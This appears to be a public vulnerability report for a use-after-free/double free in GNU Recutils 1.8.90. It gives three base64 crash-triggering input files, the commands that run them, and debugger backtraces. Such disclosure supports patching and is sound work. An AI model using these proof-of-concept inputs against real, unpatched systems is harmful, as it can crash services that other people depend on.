Headline
CVE-2021-46022: Use After Free in in rec_mset_elem_destroy() at rec-mset.c:83
An Use-After-Free vulnerability in rec_mset_elem_destroy() at rec-mset.c of GNU Recutils v1.8.90 can lead to a segmentation fault or application crash.
# Use After Free in in rec_mset_elem_destroy() at rec-mset.c:83
## Description
An Use After Free was discovered in rec_mset_elem_destroy() at rec-mset.c:83. The vulnerability causes a segmentation fault and application crash.
**version**
ea03fdaf84860488e6aa09f40cfbaeca8c02fb03
```
./recsel --version
recsel (GNU recutils) 1.8.90
Copyright © 2010-2020 Jose E. Marchesi.
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html\.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by Jose E. Marchesi.
```
**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
## Proof of Concept
### poc1
**poc**
```
base64 poc
IyAtKi0gbW9kZTogcmVjIAoKCiVyZWM6IEJvb2sKCiV5OiBUaXRsZQoKJXR5cGU6IExvY2F0aW9u
IGVudW0gbG9hbmVkIGhvbWUgdW5rbm8KCgolcmVjOiBCb29rCgoleTogVGl3bgoKJWRvYzoKKwoK
I2Jvb2sgaW4gbXkgcGVyc29uYWwgY29sbGVjdGlvbi4KCgoKVGl0bGU6IEdOVSBFbWFjcyBNYW51
YVwKCkF1dGhvcjogUmljaGFyZCBNLiBTdGFsbG1hbgoKUDogRlNGCgpMb2NhdGlvbjogaG9tZQoK
CgpUaXRsZTogVGhlIENvbG91ciBvZiBNYWdpYwoKQXV0aG9yOiBUZXJyeSBQcmF0Y2hldHQKCkxv
Y2F0aW9uOiBsb2FuZWQKCgoKVGl0bGU6IE1pbyBDaWQKCkF1dGhvcjogQW5vbnltb3VhcHRlcnMu
Z251Lm9yZyBhZG1pbmlzdHJhdGlvbiBndWlkZQoKQXV0aG9yOiBOYWN0aW9ub256YWxlegoKQXV0
aG9yOiBKb3NlIEUuIE1hcmNoZXNpCgpMb2NhdGlvbjogdW5rbm93bgoKCgpUaXRsZTogWWVlbG9u
ZyBVc2VyIE1hbnVhbAoKTG9jYXRpb246IGhvbWUKCgoKIyBFbmQgb2YgYm9v////
```
**command:**
```
./recsel ./poc
```
**Result**
```
./recsel ./poc
free(): double free detected in tcache 2
[1] 663457 abort ./recsel ./pocxxxxxxxxxx ./recsel ./pocfree(): double free detected in tcache 2[1] 663457 abort ./recsel ./poc./recsel ./poc[1] 44350 segmentation fault ./recsel ./poc
```
**gdb**
```
free(): double free detected in tcache 2
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at …/sysdeps/unix/sysv/linux/raise.c:50
50 …/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────
RAX 0x0
RBX 0x7ffff7aa1880 ◂— 0x7ffff7aa1880
RCX 0x7ffff7d5a18b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108]
RDX 0x0
RDI 0x2
RSI 0x7fffffffdb40 ◂— 0x0
R8 0x0
R9 0x7fffffffdb40 ◂— 0x0
R10 0x8
R11 0x246
R12 0x7fffffffddb0 ◂— 0x0
R13 0x10
R14 0x7ffff7ffb000 ◂— 0x6565726600001000
R15 0x1
RBP 0x7fffffffde90 —▸ 0x7ffff7effb80 (main_arena) ◂— 0x0
RSP 0x7fffffffdb40 ◂— 0x0
RIP 0x7ffff7d5a18b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108]
─────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────
► 0x7ffff7d5a18b <raise+203> mov rax, qword ptr [rsp + 0x108]
0x7ffff7d5a193 <raise+211> xor rax, qword ptr fs:[0x28]
0x7ffff7d5a19c <raise+220> jne raise+260 <raise+260>
↓
0x7ffff7d5a1c4 <raise+260> call __stack_chk_fail <__stack_chk_fail>
0x7ffff7d5a1c9 nop dword ptr [rax]
0x7ffff7d5a1d0 <killpg> endbr64
0x7ffff7d5a1d4 <killpg+4> test edi, edi
0x7ffff7d5a1d6 <killpg+6> js killpg+16 <killpg+16>
0x7ffff7d5a1d8 <killpg+8> neg edi
0x7ffff7d5a1da <killpg+10> jmp kill <kill>
0x7ffff7d5a1df <killpg+15> nop
─────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsi r9 rsp 0x7fffffffdb40 ◂— 0x0
01:0008│ 0x7fffffffdb48 —▸ 0x7ffff7fe0187 ◂— mov r8, rax
02:0010│ 0x7fffffffdb50 ◂— 0x1
03:0018│ 0x7fffffffdb58 ◂— 0x0
04:0020│ 0x7fffffffdb60 ◂— 0x0
05:0028│ 0x7fffffffdb68 —▸ 0x7ffff7f09638 ◂— 0xe001200000416
06:0030│ 0x7fffffffdb70 —▸ 0x7fffffffdf10 —▸ 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
07:0038│ 0x7fffffffdb78 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax
───────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
► f 0 0x7ffff7d5a18b raise+203
f 1 0x7ffff7d39859 abort+299
f 2 0x7ffff7da43ee __libc_message+670
f 3 0x7ffff7dac47c
f 4 0x7ffff7dae0ed _int_free+1837
f 5 0x7ffff7f17db6 rec_mset_elem_destroy+38
f 6 0x7ffff7f2c01b gl_array_list_free+59
f 7 0x7ffff7f17e23 rec_mset_destroy+67
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 __GI_raise (sig=sig@entry=6) at …/sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7d39859 in __GI_abort () at abort.c:79
#2 0x00007ffff7da43ee in __libc_message (action="" fmt=fmt@entry=0x7ffff7ece285 “%s\n”) at …/sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7dac47c in malloc_printerr (str=str@entry=0x7ffff7ed05d0 “free(): double free detected in tcache 2”) at malloc.c:5347
#4 0x00007ffff7dae0ed in _int_free (av=0x7ffff7effb80 <main_arena>, p=0x5555555829a0, have_lock=0) at malloc.c:4201
#5 0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x5555555835a0) at rec-mset.c:83
#6 0x00007ffff7f2c01b in gl_array_list_free (list=0x5555555823c0) at gl_array_list.c:433
#7 0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at …/lib/gl_list.h:799
#8 rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#9 rec_mset_destroy (mset=0x55555557e700) at rec-mset.c:233
#10 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x55555557e950) at rec-rset.c:1024
#11 rec_rset_destroy (rset=0x55555557e950) at rec-rset.c:994
#12 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579f00, rset=rset@entry=0x7fffffffe010) at rec-parser.c:979
#13 0x0000555555559663 in recutl_parse_db_from_file (in=in@entry=0x5555555772a0, file_name=file_name@entry=0x7fffffffe4ec "/home/aidai/fuzzing/recutils/fuckresults/fucksel/__GI_raise-__GI_abort/id:000011,sig:06,src:000002,op:ext_AO,pos:112", db=db@entry=0x555555579b60) at recutl.c:238
#14 0x0000555555559816 in recutl_build_db (argc=2, argv=0x7fffffffe1e8) at recutl.c:320
#15 0x0000555555558f76 in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1e8) at recsel.c:429
#16 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558f40 <main>, argc=2, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at …/csu/libc-start.c:308
#17 0x0000555555558fce in _start () at recsel.c:441
```
### poc2
**poc**
```
base64 poc
I/8h
```
**command:**
```
./recsel ./poc
```
**Result**
```
./recsel ./poc
[1] 44350 segmentation fault ./recsel ./poc
```
**gdb**
```
Program received signal SIGSEGV, Segmentation fault.
__GI___libc_free (mem=0x6d) at malloc.c:3102
3102 malloc.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
RAX 0x0
RBX 0x1
RCX 0x3
RDX 0x2
RDI 0x6d
RSI 0x55555557a1a0 —▸ 0x55555557a180 —▸ 0x55555557a160 ◂— 0x0
R8 0x2
R9 0x7c
R10 0x7ffff7f0bef6 ◂— ‘rec_comment_destroy’
R11 0x7ffff7f196c0 (rec_comment_destroy) ◂— endbr64
R12 0x55555557a110 —▸ 0x7ffff7f5d2e0 (gl_array_list_implementation) —▸ 0x7ffff7f2c040 (gl_array_nx_create_empty) ◂— endbr64
R13 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
R14 0x7fffffffe020 ◂— 0x4
R15 0x6d
RBP 0x55555557b410 ◂— 0x2
RSP 0x7fffffffdf20 ◂— 0x1
RIP 0x7ffff7db1870 (free+32) ◂— mov rax, qword ptr [rdi - 8]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
► 0x7ffff7db1870 <free+32> mov rax, qword ptr [rdi - 8]
0x7ffff7db1874 <free+36> lea rsi, [rdi - 0x10]
0x7ffff7db1878 <free+40> test al, 2
0x7ffff7db187a <free+42> jne free+96 <free+96>
↓
0x7ffff7db18b0 <free+96> mov edx, dword ptr [rip + 0x14d9fe] <0x7ffff7eff2b4>
0x7ffff7db18b6 <free+102> test edx, edx
0x7ffff7db18b8 <free+104> jne free+123 <free+123>
↓
0x7ffff7db18cb <free+123> mov rdi, rsi
0x7ffff7db18ce <free+126> add rsp, 0x18
0x7ffff7db18d2 <free+130> jmp munmap_chunk <munmap_chunk>
↓
0x7ffff7dac630 <munmap_chunk> sub rsp, 8
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdf20 ◂— 0x1
01:0008│ 0x7fffffffdf28 —▸ 0x7ffff7fb2530 —▸ 0x7ffff7f06000 ◂— 0x10102464c457f
02:0010│ 0x7fffffffdf30 ◂— 0x1b3
03:0018│ 0x7fffffffdf38 —▸ 0x7ffff7f17db6 (rec_mset_elem_destroy+38) ◂— mov rdi, rbp
04:0020│ 0x7fffffffdf40 —▸ 0x55555557b448 ◂— 0x0
05:0028│ 0x7fffffffdf48 —▸ 0x7ffff7f2c01b (gl_array_list_free+59) ◂— sub rbx, 1
06:0030│ 0x7fffffffdf50 —▸ 0x55555557a030 ◂— 0x3
07:0038│ 0x7fffffffdf58 ◂— 0x3
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
► f 0 0x7ffff7db1870 free+32
f 1 0x7ffff7f17db6 rec_mset_elem_destroy+38
f 2 0x7ffff7f2c01b gl_array_list_free+59
f 3 0x7ffff7f17e23 rec_mset_destroy+67
f 4 0x7ffff7f17e23 rec_mset_destroy+67
f 5 0x7ffff7f17e23 rec_mset_destroy+67
f 6 0x7ffff7f1b781 rec_rset_destroy+113
f 7 0x7ffff7f1b781 rec_rset_destroy+113
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 __GI___libc_free (mem=0x6d) at malloc.c:3102
#1 0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x55555557b410) at rec-mset.c:83
#2 0x00007ffff7f2c01b in gl_array_list_free (list=0x55555557a110) at gl_array_list.c:433
#3 0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at …/lib/gl_list.h:799
#4 rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#5 rec_mset_destroy (mset=0x55555557a030) at rec-mset.c:233
#6 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x555555579fd0) at rec-rset.c:1024
#7 rec_rset_destroy (rset=0x555555579fd0) at rec-rset.c:994
#8 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579f00, rset=rset@entry=0x7fffffffe020) at rec-parser.c:979
#9 0x0000555555559663 in recutl_parse_db_from_file (in=in@entry=0x5555555772a0, file_name=file_name@entry=0x7fffffffe4f4 "…/…/fuckresults/fucksel/__GI___libc_free-rec_mset_elem_destroy/id:000000,sig:11,src:000001,op:havoc,rep:32", db=db@entry=0x555555579b60) at recutl.c:238
#10 0x0000555555559816 in recutl_build_db (argc=2, argv=0x7fffffffe1f8) at recutl.c:320
#11 0x0000555555558f76 in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1f8) at recsel.c:429
#12 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558f40 <main>, argc=2, argv=0x7fffffffe1f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1e8) at …/csu/libc-start.c:308
#13 0x0000555555558fce in _start () at recsel.c:441
```
### poc3
**poc**
```
base64 poc
IyAtKi0gbW9kZTogcmVjIAoKCiVyZWM6IEJvb2sKCiV5OiBUaXRsZQoKJXR5cGU6IExvY2F0aW9u
IGVudW0gbG9hbmVkIGhvbWUgdW5rbm8KCgolcmVjOiBCb29rCgoleTogVGl3bgoKJWRvYzoKKyBB
IGJvb2sgaW4gbXkgcGVyc29uYWwgY29sbGVjdGlvbi4KCgoKVGl0bGU6IEdOVSBFbWFjcyBNYW51
YVwKCkF1dGhvcjogUmljaGFyZCBNLiBTdGFsbG1hbgoKUDogRlNGCgpMb2NhdGlvbjogaG9tZQoK
CgpUaXRsZTogVGhlIENvbG91ciBvZiBNYWdpYwoKQXV0aG9yOiBUZXJyeSBQcmF0Y2hldHQKCkxv
Y2F0aW9uOiBsb2FuZWQKCgoKVGl0bGU6IE1pbyBDaWQKCkF1dGhvcjogQW5vbnltb3VhcHRlcnMu
Z251Lm9yZyBhZG1pbmlzdHJhdGlvbiBndWlkZQoKQXV0aG9yOiBOYWN0aW9ub256YWxlegoKQXV0
aG9yOiBKb3NlIEUuIE1hcmNoZXNpCgpMb2NhdGlvbjogdW5rbm93bgoKCgpUaXRsZTogWWVlbG9u
ZyBVc2VyIE1hbnVhbAoKTG9jYXRpb246IGhvbWUKCgoKIyBFbmQgb2YgYm8KCiP/
```
**command:**
```
./recinf ./poc
```
**Result**
```
./recinf ./poc
double free or corruption (fasttop)
[1] 3557061 abort ./recinf ./poc
```
**gdb**
```
double free or corruption (fasttop)
Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at …/sysdeps/unix/sysv/linux/raise.c:50
50 …/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────
RAX 0x0
RBX 0x7ffff7aa1880 ◂— 0x7ffff7aa1880
RCX 0x7ffff7d5a18b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108]
RDX 0x0
RDI 0x2
RSI 0x7fffffffdb60 ◂— 0x0
R8 0x0
R9 0x7fffffffdb60 ◂— 0x0
R10 0x8
R11 0x246
R12 0x7fffffffddd0 ◂— 0x0
R13 0x10
R14 0x7ffff7ffb000 ◂— 0x62756f6400001000
R15 0x1
RBP 0x7fffffffdeb0 —▸ 0x7ffff7effb80 (main_arena) ◂— 0x0
RSP 0x7fffffffdb60 ◂— 0x0
RIP 0x7ffff7d5a18b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108]
─────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────
► 0x7ffff7d5a18b <raise+203> mov rax, qword ptr [rsp + 0x108]
0x7ffff7d5a193 <raise+211> xor rax, qword ptr fs:[0x28]
0x7ffff7d5a19c <raise+220> jne raise+260 <raise+260>
↓
0x7ffff7d5a1c4 <raise+260> call __stack_chk_fail <__stack_chk_fail>
0x7ffff7d5a1c9 nop dword ptr [rax]
0x7ffff7d5a1d0 <killpg> endbr64
0x7ffff7d5a1d4 <killpg+4> test edi, edi
0x7ffff7d5a1d6 <killpg+6> js killpg+16 <killpg+16>
0x7ffff7d5a1d8 <killpg+8> neg edi
0x7ffff7d5a1da <killpg+10> jmp kill <kill>
0x7ffff7d5a1df <killpg+15> nop
─────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsi r9 rsp 0x7fffffffdb60 ◂— 0x0
01:0008│ 0x7fffffffdb68 —▸ 0x7ffff7f09638 ◂— 0xe001200000416
02:0010│ 0x7fffffffdb70 —▸ 0x7fffffffdf30 —▸ 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
03:0018│ 0x7fffffffdb78 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax
04:0020│ 0x7fffffffdb80 —▸ 0x7ffff7f1aff0 (rec_rset_comment_disp_fn) ◂— endbr64
05:0028│ 0x7fffffffdb88 ◂— 0x1
06:0030│ 0x7fffffffdb90 ◂— 0x2
07:0038│ 0x7fffffffdb98 ◂— 0x0
───────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
► f 0 0x7ffff7d5a18b raise+203
f 1 0x7ffff7d39859 abort+299
f 2 0x7ffff7da43ee __libc_message+670
f 3 0x7ffff7dac47c
f 4 0x7ffff7dadde5 _int_free+1061
f 5 0x7ffff7f17db6 rec_mset_elem_destroy+38
f 6 0x7ffff7f2c01b gl_array_list_free+59
f 7 0x7ffff7f17e23 rec_mset_destroy+67
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 __GI_raise (sig=sig@entry=6) at …/sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7d39859 in __GI_abort () at abort.c:79
#2 0x00007ffff7da43ee in __libc_message (action="" fmt=fmt@entry=0x7ffff7ece285 “%s\n”) at …/sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7dac47c in malloc_printerr (str=str@entry=0x7ffff7ed0628 "double free or corruption (fasttop)") at malloc.c:5347
#4 0x00007ffff7dadde5 in _int_free (av=0x7ffff7effb80 <main_arena>, p=0x555555581a30, have_lock=0) at malloc.c:4266
#5 0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x555555581f70) at rec-mset.c:83
#6 0x00007ffff7f2c01b in gl_array_list_free (list=0x55555557d420) at gl_array_list.c:433
#7 0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at …/lib/gl_list.h:799
#8 rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#9 rec_mset_destroy (mset=0x55555557d340) at rec-mset.c:233
#10 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x55555557d2e0) at rec-rset.c:1024
#11 rec_rset_destroy (rset=0x55555557d2e0) at rec-rset.c:994
#12 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579b60, rset=rset@entry=0x7fffffffe030) at rec-parser.c:979
#13 0x00007ffff7f1fcf6 in rec_parse_db (parser=0x555555579b60, db=0x7fffffffe080) at rec-parser.c:1001
#14 0x000055555555a05a in print_info_file (in=<optimized out>, file_name=0x7fffffffe4ec “/home/aidai/fuzzing/recutils/fuckresults/fuckinf/__GI_raise-__GI_abort/id:000012,sig:06,src:000002,op:ext_AO,pos:500”) at recinf.c:125
#15 0x0000555555558f3c in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1e8) at recinf.c:239
#16 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558e20 <main>, argc=2, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at …/csu/libc-start.c:308
#17 0x0000555555558fde in _start () at recinf.c:234
```